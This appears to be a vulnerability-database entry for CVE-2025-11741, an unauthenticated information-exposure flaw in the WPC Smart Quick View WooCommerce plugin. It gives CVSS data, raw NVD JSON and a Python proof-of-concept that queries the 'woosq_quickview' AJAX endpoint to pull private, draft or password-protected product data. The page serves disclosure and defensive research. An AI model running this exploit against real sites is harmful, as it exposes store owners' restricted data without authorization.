Security Vulnerability Report
中文
CVE-2025-11741 CVSS 5.3 MEDIUM

CVE-2025-11741

Published: 2025-10-18 07:15:36
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The WPC Smart Quick View for WooCommerce plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 4.2.5 via the 'woosq_quickview' AJAX endpoint due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft products that they should not have access to.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WPC Smart Quick View for WooCommerce <= 4.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11741 PoC - WPC Smart Quick View Information Exposure # Exploits the 'woosq_quickview' AJAX endpoint to access restricted products import requests target_url = "https://target-wordpress-site.com" # WordPress AJAX endpoint (works for both logged-in and non-logged-in users) ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Step 1: Discover product IDs (can be obtained from various sources) # Target IDs including draft, private, or password-protected products target_product_ids = [1, 2, 3, 100, 101, 102, 1000, 1001] # Step 2: Send AJAX requests to extract restricted product information for product_id in target_product_ids: params = { "action": "woosq_quickview", "product_id": product_id } response = requests.get(ajax_url, params=params) if response.status_code == 200 and response.text.strip(): print(f"[+] Product ID {product_id} - Data exposed:") print(response.text) print("-" * 80) else: print(f"[-] Product ID {product_id} - No data returned or access denied") # Alternative: POST request variant # response = requests.post(ajax_url, data=params) # Note: This vulnerability allows unauthenticated access to: # - Password protected products # - Private products # - Draft products # Without any authentication or user interaction required.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11741", "sourceIdentifier": "[email protected]", "published": "2025-10-18T07:15:36.047", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WPC Smart Quick View for WooCommerce plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 4.2.5 via the 'woosq_quickview' AJAX endpoint due to insufficient restrictions on which posts can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft products that they should not have access to."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3379189%40woo-smart-quick-view&new=3379189%40woo-smart-quick-view&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/220487de-2a1c-47ec-ac65-db1af44aed3d?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.